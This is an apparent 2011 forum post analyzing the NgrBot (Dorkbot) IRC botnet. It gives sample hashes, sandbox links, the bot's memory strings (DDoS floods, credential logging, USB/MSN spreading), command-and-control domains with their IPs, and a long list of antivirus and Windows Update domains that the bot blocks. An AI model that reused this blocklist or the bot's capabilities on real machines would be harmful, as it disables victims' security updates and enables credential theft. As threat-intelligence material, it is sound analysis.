NgrBot (aka Win32/Dorkbot.gen!A)


Postby Xylitol » Tue May 31, 2011 8:43 pm

This thread is about the IRC Bot: NgrBot, a reptile mod.
It has a lot of features like injection into multiple system processes, ruskill for killing processes, blocking AV updates and Windows security updates, MSN spread, FTP infection, etc.

Here is a description from one coder of the NgrBot's development team:
[image not preserved]

2 Samples attached.


Microsoft MPC ~ http://www.microsoft.com/security/porta ... FDorkbot.A

VirusTotal result:
5C32CC9667CE83C42D95A28760044107.exe.ViR: http://www.virustotal.com/file-scan/rep ... 1306869496
59331fe7a82583ae9ebfbdf0f8b68f9f.exe.ViR: http://www.virustotal.com/file-scan/rep ... 1305489998

Online Sandbox results:
5C32CC9667CE83C42D95A28760044107.exe.ViR: (Sample from today, 31 May 2k11)
http://anubis.iseclab.org/?action=resul ... ormat=html
http://www.sunbeltsecurity.com/cwsandbo ... 5A286E68F2
http://camas.comodo.com/cgi-bin/submit? ... 26f384dbfd
http://www.threatexpert.com/report.aspx ... 8760044107

59331fe7a82583ae9ebfbdf0f8b68f9f.exe.ViR: (Sample from 29 April 2k11, yeah, I have had it for a long time)
http://anubis.iseclab.org/?action=resul ... ormat=html
http://www.sunbeltsecurity.com/cwsandbo ... 935B7BCA51
http://camas.comodo.com/cgi-bin/submit? ... a3d1d3eef7
http://www.threatexpert.com/report.aspx ... F0F8B68F9F

Example with 5C32CC9667CE83C42D95A28760044107.exe.ViR:

Some memory strings:
Code:
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
dns
msn
httpspread
blk
http://api.wipmania.com/
\\.\pipe\%08x_ipc
heytherebitch.com
ngrBot
keshmoney.biz
ngrBot
smellypussy.info
ngrBot
#boss
ngrBot
bossman
Vmv
30e41aa1
FvLQ49IlzIyLjj6m
die
msn.set
msn.int
http.set
http.int
http.inj

Ruskill feature ~ hXXp://www.freewebtown.com/usermx/av.txt
contains:
Code:
1norton.com
dnl-cd14.kaspersky-labs.com
dnl-kr14.kaspersky-labs.com
download657.avast.com
dl3.antivir-pe.com
sophos3.ucd.ie
updates1.kaspersky-labs.com
diamondcs.fileburst.com
bitdefender.fr
sophos4.ucd.ie
updates2.kaspersky-labs.com
dispatch.mcafee.com
bkav.com.vn
sophos5.ucd.ie
updates3.kaspersky-labs.com
blackice.iss.net
sophos6.ucd.ie
updates4.kaspersky-labs.com
dl1.antivir.de
ca.com
download.microsoft.com
go.microsoft.com
msdn.microsoft.com
office.microsoft.com
windowsupdate.microsoft.com
avp.ru
kaspersky.ru
kaspersky.com
kaspersky-labs.com
downloads1.kaspersky-labs.com
downloads2.kaspersky-labs.com
downloads3.kaspersky-labs.com
downloads4.kaspersky-labs.com
downloads5.kaspersky-labs.com
viruslist.com
viruslist.ru
symantec.com
customer.symantec.com
liveupdate.symantec.com
liveupdate.symantecliveupdate.com
securityresponse.symantec.com
service1.symantec.com
updates.symantec.com
ad.doubleclick.net
ad.fastclick.net
ads.fastclick.net
ar.atwola.com
atdmt.com
avp.ch
avp.com
awaps.net
banner.fastclick.net
banners.fastclick.net
click.atdmt.com
clicks.atdmt.com
download.mcafee.com
downloads.microsoft.com
engine.awaps.net
fastclick.net
f-secure.com
ftp.f-secure.com
ftp.sophos.com
mast.mcafee.com
mcafee.com
media.fastclick.net
my-etrust.com
nai.com
networkassociates.com
phx.corporate-ir.net
secure.nai.com
sophos.com
spd.atdmt.com
support.microsoft.com
update.symantec.com
us.mcafee.com
vil.nai.com
trendmicro.com
www3.ca.com
ids.kaspersky-labs.com
rads.mcafee.com
grisoft.com
avira.com
bitdefender.com
dl2.antivir.de
dl3.antivir.de
dl4.antivir.de
downloads-us1.kaspersky-labs.com
downloads-us2.kaspersky-labs.com
downloads-us3.kaspersky-labs.com
drweb.com
eset.com
free-av.com
ftp.downloads2.kaspersky-labs.com
ftp.kasperskylab.ru
microsoft.com
updates5.kaspersky-labs.com
virusscan.jotti.org
virustotal.com
update.ikaka.com
msnfix.changelog.fr
incodesolutions.com
virusinfo.prevx.com
download.bleepingcomputer.com
dazhizhu.cn
foro.noticias3d.com
nabble.com
lurker.clamav.net
lexikon.ikarus.at
research.sunbelt-software.com
virusdoctor.jp
elitepvpers.de
guru.avg.com
superuser.co.kr
ntfaq.co.kr
v.dreamwiz.com
cit.kookmin.ac.kr
forums.whatthetech.com
forum.hijackthis.de
avg.vo.llnwd.net
huaifai.go.th
mostz.com
krupunmai.com
cddchiangmai.net
forum.malekal.com
tech.pantip.com
sapcupgrades.com
247fixes.com
forum.sysinternals.com
forum.telecharger.01net.com
foros.softonic.com
avast-home.uptodown.com
dr-web-cureit.softonic.com
chkrootkit.org
diamondcs.com.au
rootkit.nl
sysinternals.com
z-oleg.com
espanol.dir.groups.yahoo.com
castlecrops.com
misec.net
safecomputing.umn.edu
antirootkit.com
greatis.com
ar.answers.yahoo.com
elhacker.org
rootkit.com
pctools.com
pcsupportadvisor.com
resplendence.com
personal.psu.edu
foro.ethek.com
foro.elhacker.net
vil.nail.com
search.mcafee.com
wmcafee.com
download.nai.com
wexperts-exchange.com
bakunos.com
darkclockers.com
Merijn.org
spywareinfo.com
spybot.info
hijackthis.de
forum.kaspersky.com
majorgeeks.com
linhadefensiva.uol.com.br
cmmings.cn
sergiwa.com
el-hacker.com
avg-antivirus.net
bleepingcomputer.com
free.grisoft.com
alerta-antivirus.inteco.es
analysis.seclab.tuwien.ac.at
kztechs.com
ad-aware-se.uptodown.com
stdio-labs.blogspot.com
box.net
foro.el-hacker.com
free.avg.com
tecno-soft.com
ladooscuro.es
ftp.drweb.com
download.microsoft.comguru0.grisoft.cz
guru1.grisoft.cz
guru2.grisoft.cz
guru3.grisoft.cz
it.answers.yahoo.com
softonic.com
guru4.grisoft.cz
guru5.grisoft.cz
virusspy.com
download.f-secure.com
malwareremoval.com
forums.cnet.com
hjt-data.trend-braintree.com
pantip.com
secubox.aldria.com
forospyware.com
manuelruvalcaba.com
zonavirus.com
leforo.com
siteadvisor.com
blog.threatfire.com
threatexpert.com
blog.hispasec.com
configurarequipos.com
sosvirus.changelog.fr
psicofxp.com
mailcenter.rising.com.cn
mailcenter.rising.com
rising.com.cn
rising.com
babooforum.com.br
runscanner.net
blogschapines.com
upload.changelog.fr
raymond.cc
changelog.fr
pcentraide.com
atazita.blogspot.com
thinkpad.cn
final4ever.com
files.filefont.com
infos-du-net.com
trendsecure.com
forum.hardware.fr
utilidades-utiles.com
blogs.icerocket.com
spychecker.com
geekstogo.com
forums.maddoktor2.com
smokey-services.eu
clubic.com
linhadefensiva.org
rolandovera.com
download.sysinternals.com
pcguide.com
thetechguide.com
ozzu.com
changedetection.com
espanol.groups.yahoo.com
sunbeltsecurity.com
community.thaiware.com
avpclub.ddns.info
offensivecomputing.net
boardreader.com
guiadohardware.net
msnvirusremoval.com
cisrt.org
fixmyim.com
samroeng.hi5.com
daboweb.com
forums.techguy.org
hijackthis.download3000.com
cybertechhelp.com
superdicas.com.br
51nb.com
downloads.andymanchesta.com
andymanchesta.com
info.prevx.com
aknow.prevx.com
securitywonks.net
yoreparo.com
lavasoft.com
virscan.org
eeload.com
file.net
onecare.live.com
mvps.org
laneros.com
housecall.trendmicro.com
avast.com
onlinescan.avast.com
ewido.net
trucoswindows.net
mozilla-hispano.org
futurenow.bitdefender.com
f-prot.com
security.symantec.com
oldtimer.geekstogo.com
kr.ahnlab.com
thejokerx.blogspot.com
2-spyware.com
antivir.es
prevx.com
ikarus.net
bbs.s-sos.net
forums.majorgeeks.com
castlecops.com
kaspersky.es
subs.geekstogo.com
forospanish.com
fortinet.com
safer-networking.org
fortiguardcenter.com
dougknox.com
vsantivirus.com
firewallguide.com
auditmypc.com
spywaredb.com
mxttchina.com
ziggamza.net
forospyware.es
pogonyuto.forospanish.com
antivirus.comodo.com
spywareterminator.com
eradicatespyware.net
freespywareremoval.info
personalfirewall.comodo.com
clamav.net
antivirus.about.com
pandasecurity.com
webphand.com
mx.answers.yahoo.com
sandboxie.com
clamwin.com
cwsandbox.org
arswp.com
es.answers.yahoo.com
trucoswindows.es
networkworld.com
norman.com
espanol.answers.yahoo.com
tallemu.com
viruschief.com
scanner.virus.org
housecall65.trendmicro.com
hjt.networktechs.com
techsupportforum.com
whatthetech.com
soccersuck.com
comunidad.wilkinsonpc.com.co
forum.piriform.com
tweaksforgeeks.com
daniweb.com
pchell.com
spyany.com
experts-exchange.com
wikio.es
forums.devshed.com
forum.tweaks.com
wilderssecurity.com
techspot.com
thecomputerpitstop.com
es.wasalive.com
secunia.com
es.kioskea.net
taringa.net
cyberdefender.com
feedage.com
new.taringa.net
forum.zazana.com
forum.clubedohardware.com.br
computing.net
discussions.virtualdr.com
forum.securitycadets.com
techimo.com
13iii.com
dicasweb.com.br
infosecpodcast.com
usbcleaner.cn
net-security.org
bleedingthreats.net
acs.pandasoftware.com
funkytoad.com
360safe.cn
360safe.com
bbs.360safe.cn
bbs.360safe.com
codehard.wordpress.com
360.cn
360.com
p3dev.taringa.net
precisesecurity.com
baike.360.cn
baike.360.com
kaba.360.cn
kaba.360.com
deckard.geekstogo.com
forums.comodo.com
down.360safe.cn
down.360safe.com
x.360safe.com
dl.360safe.com
hotshare.net
free.antivirus.com
updatem.360safe.com
updatem.360safe.cn
update.360safe.cn
update.360safe.com
bbs.duba.net
duba.net
zhidao.baidu.com
hi.baidu.com
drweb.com.es
msncleaner.softonic.com
javacoolsoftware.com
file.ikaka.com
file.ikaka.cn
bbs.ikaka.com
zhidao.ikaka.com
eset-la.com
software-files.download.com
ikaka.com
ikaka.cn
bbs.cfan.com.cn
cfan.com.cn
es.mcafee.com
downloads.malwarebytes.org
bbs.kafan.cn
bbs.kafan.com
bbs.kpfans.com
bbs.taisha.org
support.f-secure.com
bbs.winzheng.com
foros.zonavirus.com
alerta-antivirus.red.es
malwarebytes.org
commentcamarche.net
infospyware.com
bitdefender.es
foros.toxico-pc.com
emsisoft.de
securitynewsportal.com
secuser.com
a188.x.akamai.net
liveupdate.symantec.d4p.net
ftp.nai.com
grisoft.cz
free.grisoft.cz
tds.diamondcs.com.au
ieupdate.gdata.de
ieupdate6.gdata.de
ieupdate5.gdata.de
ieupdate4.gdata.de
ieupdate3.gdata.de
ieupdate2.gdata.de
ieupdate1.gdata.de
iavs.cz
download7.avast.com
download6.avast.com
download5.avast.com
download4.avast.com
download3.avast.com
download2.avast.com
download1.avast.com
upgrade.bitdefender.com
lavasoftusa.com
a-2.org
updates.a-2.org
niuone.norman.no
attechnical.com
zeylstra.nl
fractus.mat.uson.mx
toonbox.de
radius.turvamies.com
downloads.My-eTrust.com
v4.windowsupdate.microsoft.com
v5.windowsupdate.microsoft.com
NoAdware.net
nod32.com
eset.sk
avu.zonelabs.com
retail.sp.f-secure.com
retail01.sp.f-secure.com
retail02.sp.f-secure.com
moosoft.com
secuser.model-fx.com
downloads-eu1.kaspersky-labs.com
pccreg.antivirus.com
updates.sald.com
k-otik.com
megasecurity.org
fr.mcafee.com
antivirus.cai.com
pandasoftware.com
securitoo.com
Kaspersky-FR.com
avgfrance.com
antivirus-online.de
ftp.esafe.com
ftp.microworldsystems.com
ftp.europe.f-secure.com
ftp.ca.co
ftp.symantec.com
files.trendmicro-europe.com
akamai.net
inline-software.de
ravantivirus.com
drsolomon.com
openantivirus.org
pandasoftware.es
dialognauka.ru
viguard.com
nod32.lu
zonelabs.fr
anti-virus-software-review.com
vet.com.au
eicar.org
anti-virus.com
microsoft.fr
trendmicro.fr
fr.bitdefender.com
sophos.fr
nsclean.com
antiviraldp.com
pestpatrol.com
agnitum.com
simplysup.com
centralcommand.com
www1.my-etrust.com
authentium.com
finjan.com
psnw.com
gwava.nl
gecadsoftware.com
pspl.com
safetynet.com
stiller.com
sybari.com
wildlist.com
mcaffee.com
deerfield.com
kerio.com
looknstop.com
mcafee-at-home.com
sygate.com
tinysoftware.com
visualizesoftware.com
zonelabs.com
zonelog.co.uk
webroot.com
lavasoft.nu
spywareguide.com
aluriasoftware.com
spyblocker-software.com
spycop.com
wilderssecurity.net
trapware.com
winpatrol.com
liutilities.com
x-cleaner.com
shop.symantec.com
kaspersky.co.uk
housecall.com
sophos7.ucd.ie
dl1.antivir-pe.com
sophos8.ucd.ie
dl1.antivir-pe.de
sophos9.ucd.ie
dl1.avgate.net
sos.rising.com.cn
dl10.freeav.net
spftrl.digitalriver.com
stats.norton.com
dl2.antivir-pe.com
sucop.com
dl2.antivir-pe.de
sunbeltsoftware.com
dl2.avgate.net
download.com
sunbelt-software.com
vrv.com.cn
download.com.vn
dl3.antivir-pe.de
symantec-ese.baynote.net
dl3.avgate.net
u19.eset.com
u38.eset.com
mmsk.cn
u91.eset.com
download516.avast.com
9down.com
dl7.avgate.net
u63.eset.com
dnl-ru1.kaspersky-labs.com
tool.ikaka.com
moneybookers.com
u25.eset.com
u98.eset.com
download925.avast.com
download94.avast.com
bbs.kaspersky.com.cn
download926.avast.com
download940.avast.com
bbs.mcafeefans.com
download927.avast.com
download941.avast.com
bbs.sucop.com
download928.avast.com
download942.avast.com
bbs.trendmicro.com.cn
download929.avast.com
download943.avast.com
download93.avast.com
download944.avast.com
bitdefender.com.ua
download930.avast.com
download945.avast.com
download931.avast.com
download946.avast.com
buddy.bitdefender.com
download932.avast.com
download947.avast.com
buy.rising.com.cn
download933.avast.com
download948.avast.com
download934.avast.com
download949.avast.com
cdn.atwola.com
download935.avast.com
download95.avast.com
center.rising.com.cn
download936.avast.com
download950.avast.com
cert.org
download937.avast.com
download951.avast.com
download938.avast.com
download952.avast.com
download939.avast.com
download953.avast.com
download954.avast.com
download955.avast.com
cn.mcafee.com
download956.avast.com
download957.avast.com
cn.trendmicro.com
download958.avast.com
download959.avast.com
comodo.com
download96.avast.com
download960.avast.com
coresecurity.com
download961.avast.com
download962.avast.com
cpsecure.com
download963.avast.com
download964.avast.com
csc.rising.com.cn
download965.avast.com
download966.avast.com
download967.avast.com
download968.avast.com
download969.avast.com
download97.avast.com
download970.avast.com
download971.avast.com
dl4.antivir-pe.com
download972.avast.com
download973.avast.com
dl4.antivir-pe.de
download974.avast.com
download975.avast.com
dl4.avgate.net
download976.avast.com
download977.avast.com
dl5.avgate.net
download978.avast.com
download979.avast.com
dl6.avgate.net
download98.avast.com
download980.avast.com
dl8.avgate.net
download99.avast.com
dl8.freeav.net
dl9.avgate.net
dl9.freeav.net
dnl-cd1.kaspersky-labs.com
dnl-cd10.kaspersky-labs.com
dswlab.com
eeye.com
dnl-cd11.kaspersky-labs.com
emsisoft.com
dnl-cd12.kaspersky-labs.com
esafe.com
download684.avast.com
dnl-cd4.kaspersky-labs.com
downloads-eu2.kaspersky-labs.com
dnl-us9.kaspersky-labs.com
download649.avast.com
dnl-cn15.kaspersky-labs.com
download618.avast.com
download695.avast.com
download603.avast.com
download685.avast.com
dnl-cd5.kaspersky-labs.com
downloads-eu3.kaspersky-labs.com
download.avg.com
download650.avast.com
download619.avast.com
fw.rising.com.cn
shudoo.com
download696.avast.com
download604.avast.com
download686.avast.com
dnl-cd6.kaspersky-labs.com
downloads-eu4.kaspersky-labs.com
download651.avast.com
download620.avast.com
fx.dk
download697.avast.com
bbs.janmeng.com
download605.avast.com
download687.avast.com
dnl-cd7.kaspersky-labs.com
download.eset.com
download652.avast.com
download621.avast.com
gdata.de
download698.avast.com
dnl-cd13.kaspersky-labs.com
download606.avast.com
download688.avast.com
filseclab.com
dnl-cd8.kaspersky-labs.com
download653.avast.com
download622.avast.com
download699.avast.com
dnl-cd2.kaspersky-labs.com
download607.avast.com
download689.avast.com
dnl-cd9.kaspersky-labs.com
download654.avast.com
download623.avast.com
go.rising.com.cn
dnl-cd3.kaspersky-labs.com
download608.avast.com
download690.avast.com
forum.ikaka.com
dnl-cn1.kaspersky-labs.com
downloads-us4.kaspersky-labs.com
download.norman.no
download655.avast.com
download624.avast.com
download7.quickheal.com
dnl-cn10.kaspersky-labs.com
download609.avast.com
download691.avast.com
forum.jiangmin.com
dnl-cn11.kaspersky-labs.com
sandbox.norman.com
download.rising.com.cn
download656.avast.com
download625.avast.com
download700.avast.com
dnl-cn12.kaspersky-labs.com
download617.avast.com
download692.avast.com
dnl-cn13.kaspersky-labs.com
scanner.novirusthanks.org
ftp.updates1.kaspersky-labs.com
fr.drweb.com
download.softpedia.com
u2.eset.com
u56.eset.com
ftp.updates2.kaspersky-labs.com
download0.avast.com
u20.eset.com
u57.eset.com
ftp.updates3.kaspersky-labs.com
fr1.drweb.com
u21.eset.com
u58.eset.com
ftp.updates4.kaspersky-labs.com
fr2.drweb.com
download1.quickheal.com
u22.eset.com
u59.eset.com
ftp.us.mcafee.com
fr3.drweb.com
download10.quickheal.com
u23.eset.com
u6.eset.com
ftp.viruslist.com
fr4.drweb.com
download100.avast.com
bitdefender.secyber.net
u24.eset.com
u60.eset.com
fr5.drweb.com
download1us.softpedia.com
u26.eset.com
u61.eset.com
fr6.drweb.com
u27.eset.com
u62.eset.com
symantecliveupdate.com
fr7.drweb.com
download2.quickheal.com
u28.eset.com
u64.eset.com
symatec.com
download200.avast.com
u29.eset.com
u65.eset.com
hacksoft.com.pe
download201.avast.com
u3.eset.com
u66.eset.com
hauri.net
download202.avast.com
u30.eset.com
u67.eset.com
help.rising.com.cn
download203.avast.com
u31.eset.com
u68.eset.com
freeav.com
download204.avast.com
u32.eset.com
u69.eset.com
trendmicro.com.cn
download205.avast.com
u33.eset.com
u7.eset.com
ikarus.at
freeav.net
download206.avast.com
iss.net
u34.eset.com
u70.eset.com
uk.trendmicro-europe.com
jetico.com
free-av.net
download207.avast.com
k7computing.com
u35.eset.com
u71.eset.com
ftp.avp.com
download641.avast.com
download920.avast.com
dnl-kr7.kaspersky-labs.com
kaspersky.gr
anti-virus.by
ftp.bitdefender.com
update.sophos.com
dnl-us5.kaspersky-labs.com
JUSTFACEBOOK.NET
download214.avast.com
download81.avast.com
mcafeefans.com
mirror02.gdata.de
msk.drweb.com
msk1.drweb.com
msk2.drweb.com
msk3.drweb.com
msk4.drweb.com
msk5.drweb.com
msk6.drweb.com
msk7.drweb.com
niueight.norman.no
niufive.norman.no
niufour.norman.no
niunine.norman.no
niuseven.norman.no
niusix.norman.no
niuthree.norman.no
niutwo.norman.no
nod32.co.uk
nod32.datsec.de
nod32.ru
norton.com
notifier.antivir-pe.de
online.jiangmin.com
online.rising.com.cn
outpost.pl
pccreg.trendmicro.com
pcinternetpatrol.com
quickheal.co.in
reg.rising.com.cn
renewalcenter.symantec.com
safe.qq.com
scan.kingsoft.com
secdreg.org
securecomputing.com
shadow.grisoft.cz
shadu.baidu.com
shadu.duba.net
sophos1.ucd.ie
sophos10.ucd.ie
sophos2.ucd.ie
u0.eset.com
u1.eset.com
u10.eset.com
u100.eset.com
u11.eset.com
u12.eset.com
u13.eset.com
u36.eset.com
u78.eset.com
kaspersky.co.jp
download211.avast.com
kpfans.com
download208.avast.com
dnl-cn14.kaspersky-labs.com
download659.avast.com
ftp.ca.com
download693.avast.com
dnl-us2.kaspersky-labs.com
u36eset.com
u79.eset.com
download212.avast.com
kvup.jiangmin.com
download209.avast.com
download660.avast.com
ftp.customer.symantec.com
download694.avast.com
dnl-us3.kaspersky-labs.com
kaspersky.com.cn
u37.eset.com
u8.eset.com
kaspersky.dk
download213.avast.com
download210.avast.com
download661.avast.com
ftp.dispatch.mcafee.com
download701.avast.com
dnl-us4.kaspersky-labs.com
kaspersky.pl
u37eset.com
u80.eset.com
download3.quickheal.com
download662.avast.com
ftp.download.mcafee.com
download702.avast.com
dnl-us6.kaspersky-labs.com
kaspersky.se
u39.eset.com
u81.eset.com
kasperskylab.co.kr
download4.quickheal.com
download663.avast.com
ftp.downloads1.kaspersky-labs.com
download703.avast.com
dnl-us7.kaspersky-labs.com
kasperskylab.nl
u4.eset.com
u82.eset.com
download5.quickheal.com
download664.avast.com
download704.avast.com
dnl-us8.kaspersky-labs.com
kav.ru
u40.eset.com
u83.eset.com
kav.zonelabs.com
download501.avast.com
malwaredomainlist.com
download502.avast.com
download665.avast.com
ftp.downloads3.kaspersky-labs.com
download705.avast.com
download503.avast.com
kb.bitdefender.com
u41.eset.com
u84.eset.com
download504.avast.com
download505.avast.com
download666.avast.com
ftp.downloads4.kaspersky-labs.com
download706.avast.com
download511.avast.com
u42.eset.com
u85.eset.com
u14.eset.com
download512.avast.com
u15.eset.com
ftp.downloads-eu1.kaspersky-labs.com
download82.avast.com
ftp.downloads-eu2.kaspersky-labs.com
download658.avast.com
download513.avast.com
zeustracker.abuse.ch
dnl-us11.kaspersky-labs.com
ftp.downloads-eu3.kaspersky-labs.com
download75.avast.com
u43.eset.com
download626.avast.com
download514.avast.com
ftp.downloads-eu4.kaspersky-labs.com
download667.avast.com
download515.avast.com
zonealarm.com
dnl-us12.kaspersky-labs.com
ftp.downloads-us1.kaspersky-labs.com
download76.avast.com
zs.kingsoft.com
u44.eset.com
download627.avast.com
ftp.downloads-us2.kaspersky-labs.com
download668.avast.com
download6.quickheal.com
bitcity.info
dnl-us13.kaspersky-labs.com
ftp.downloads-us3.kaspersky-labs.com
download77.avast.com
bitcity.org
u45.eset.com
download628.avast.com
download600.avast.com
ftp.downloads-us4.kaspersky-labs.com
download669.avast.com
download601.avast.com
ilove.tigolbittys.info
dnl-us14.kaspersky-labs.com
download78.avast.com
ulove.tigolbittys.info
u46.eset.com
download629.avast.com
download602.avast.com
download670.avast.com
download630.avast.com
free.tinypicbox.com
dnl-us15.kaspersky-labs.com
ftp.f-prot.com
download79.avast.com
one.tinypicbox.com
u47.eset.com
download631.avast.com
download632.avast.com
download671.avast.com
download633.avast.com
gangbang.mytijn.org
download634.avast.com
ftp.grisoft.com
download8.quickheal.com
irc.bigshitsandwich.org
u48.eset.com
download635.avast.com
download636.avast.com
ftp.kaspersky.com
download672.avast.com
download637.avast.com
l33t.shadow-mods.net
download638.avast.com
ftp.kaspersky-labs.com
download80.avast.com
irc.metraiciono.com
u49.eset.com
download639.avast.com
download640.avast.com
ftp.liveupdate.symantec.com
download673.avast.com
download642.avast.com
download643.avast.com
ftp.liveupdate.symantecliveupdate.com
download83.avast.com
lovings.technigoyous.net
u5.eset.com
download644.avast.com
download645.avast.com
ftp.mast.mcafee.com
download674.avast.com
download646.avast.com
download647.avast.com
ftp.mcafee.com
download84.avast.com
u50.eset.com
download648.avast.com
download675.avast.com
download676.avast.com
download677.avast.com
download678.avast.com
ftp.my-etrust.com
download85.avast.com
u51.eset.com
download679.avast.com
download680.avast.com
download681.avast.com
download682.avast.com
download683.avast.com
ftp.networkassociates.com
download9.quickheal.com
u52.eset.com
download707.avast.com
u53.eset.com
download922.avast.com
ftp.norton.com
ftp.rads.mcafee.com
ftp.sandbox.norman.com
dnl-ru13.kaspersky-labs.com
u54.eset.com
download923.avast.com
ftp.secure.nai.com
ftp.securityresponse.symantec.com
dnl-ru14.kaspersky-labs.com
u55.eset.com
download924.avast.com
ftp.symantecliveupdate.com
ftp.symatec.com
ftp.trendmicro.com
dnl-ru15.kaspersky-labs.com
u72.eset.com
ftp.uk.trendmicro-europe.com
ftp.update.symantec.com
ftp.updates.symantec.com
u16.eset.com
dnl-ru2.kaspersky-labs.com
u73.eset.com
u17.eset.com
u18.eset.com
u74.eset.com
u75.eset.com
dnl-ru3.kaspersky-labs.com
u76.eset.com
u77.eset.com
u86.eset.com
u87.eset.com
u88.eset.com
dnl-ru4.kaspersky-labs.com
u89.eset.com
u9.eset.com
u90.eset.com
pcav.cn
u92.eset.com
u93.eset.com
dnl-ru5.kaspersky-labs.com
u94.eset.com
u95.eset.com
u96.eset.com
u97.eset.com
u99.eset.com
dnl-ru6.kaspersky-labs.com
up.duba.net
up.rising.com.cn
abuse.ch
up1.nod123.cn
upd.zonelabs.com
dnl-ru7.kaspersky-labs.com
update.aladdin.com
update.authentium.com
update.avg.com
update.avgfrance.com
dnl-ru8.kaspersky-labs.com
update.bitdefender.com
update.drweb.com
update.ewido.com
agfirewall.ru
update.grisoft.com
update.grisoft.cz
dnl-ru9.kaspersky-labs.com
update.hispasec.com
update.ikarus-software.at
update.quickheal.com
update.rising.com.cn
dnl-us1.kaspersky-labs.com
update.trendmicro.com
update7.jiangmin.com
agnitum.de
updates.drweb.com
dnl-us10.kaspersky-labs.com
updates.f-prot.com
agnitum.fr
download708.avast.com
upgrade1.bitdefender.com
upgrade2.bitdefender.com
agnitum.ru
download709.avast.com
upgrade3.bitdefender.com
upgrade4.bitdefender.com
ahnlab.com
download72.avast.com
download73.avast.com
download74.avast.com
download900.avast.com
download901.avast.com
download902.avast.com
download903.avast.com
ahn.com.cn
download904.avast.com
vncsvr.com
download905.avast.com
download906.avast.com
download907.avast.com
download908.avast.com
download909.avast.com
virusbuster.hu
download91.avast.com
download910.avast.com
download911.avast.com
download912.avast.com
download913.avast.com
download914.avast.com
atwola.com
download915.avast.com
download916.avast.com
download917.avast.com
download918.avast.com
download919.avast.com
download92.avast.com
bitdefender.co.uk
download921.avast.com
jotti.org
alert.rising.com.cn
antispy.ru
arcabit.com
arcabit.pl
ashampoo.com
avast.ru
avg.com
avgate.net
dnl-eu10.kaspersky-labs.com
bbs.360.cn
dnl-jp14.kaspersky-labs.com
bbs.cpcw.com
bbs.dswlab.com
dnl-jp15.kaspersky-labs.com
dnl-cn2.kaspersky-labs.com
dnl-jp2.kaspersky-labs.com
dnl-cn3.kaspersky-labs.com
dnl-jp3.kaspersky-labs.com
dnl-cn4.kaspersky-labs.com
dnl-jp4.kaspersky-labs.com
dnl-cn5.kaspersky-labs.com
dnl-cn6.kaspersky-labs.com
dnl-jp5.kaspersky-labs.com
dnl-cn7.kaspersky-labs.com
dnl-cn8.kaspersky-labs.com
dnl-cn9.kaspersky-labs.com
dnl-jp6.kaspersky-labs.com
dnl-eu1.kaspersky-labs.com
dnl-eu11.kaspersky-labs.com
dnl-eu12.kaspersky-labs.com
dnl-jp7.kaspersky-labs.com
dnl-eu13.kaspersky-labs.com
dnl-eu14.kaspersky-labs.com
dnl-eu15.kaspersky-labs.com
dnl-jp8.kaspersky-labs.com
dnl-eu2.kaspersky-labs.com
dnl-eu3.kaspersky-labs.com
dnl-eu4.kaspersky-labs.com
dnl-jp9.kaspersky-labs.com
dnl-eu5.kaspersky-labs.com
dnl-eu6.kaspersky-labs.com
dnl-eu7.kaspersky-labs.com
dnl-kr1.kaspersky-labs.com
dnl-eu8.kaspersky-labs.com
dnl-eu9.kaspersky-labs.com
dnl-jp1.kaspersky-labs.com
dnl-kr10.kaspersky-labs.com
dnl-jp10.kaspersky-labs.com
dnl-jp11.kaspersky-labs.com
dnl-jp12.kaspersky-labs.com
dnl-kr11.kaspersky-labs.com
dnl-jp13.kaspersky-labs.com
dnl-kr12.kaspersky-labs.com
dnl-kr13.kaspersky-labs.com
dnl-kr15.kaspersky-labs.com
dnl-kr2.kaspersky-labs.com
dnl-kr3.kaspersky-labs.com
dnl-kr4.kaspersky-labs.com
dnl-kr5.kaspersky-labs.com
dnl-kr6.kaspersky-labs.com
dnl-kr8.kaspersky-labs.com
dnl-kr9.kaspersky-labs.com
dnl-ru10.kaspersky-labs.com
dnl-ru11.kaspersky-labs.com
dnl-ru12.kaspersky-labs.com

DNS used for the botnet:
Code:
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]
Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]
Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]

Some lulz:
Code:
* Looking up smellypussy.info
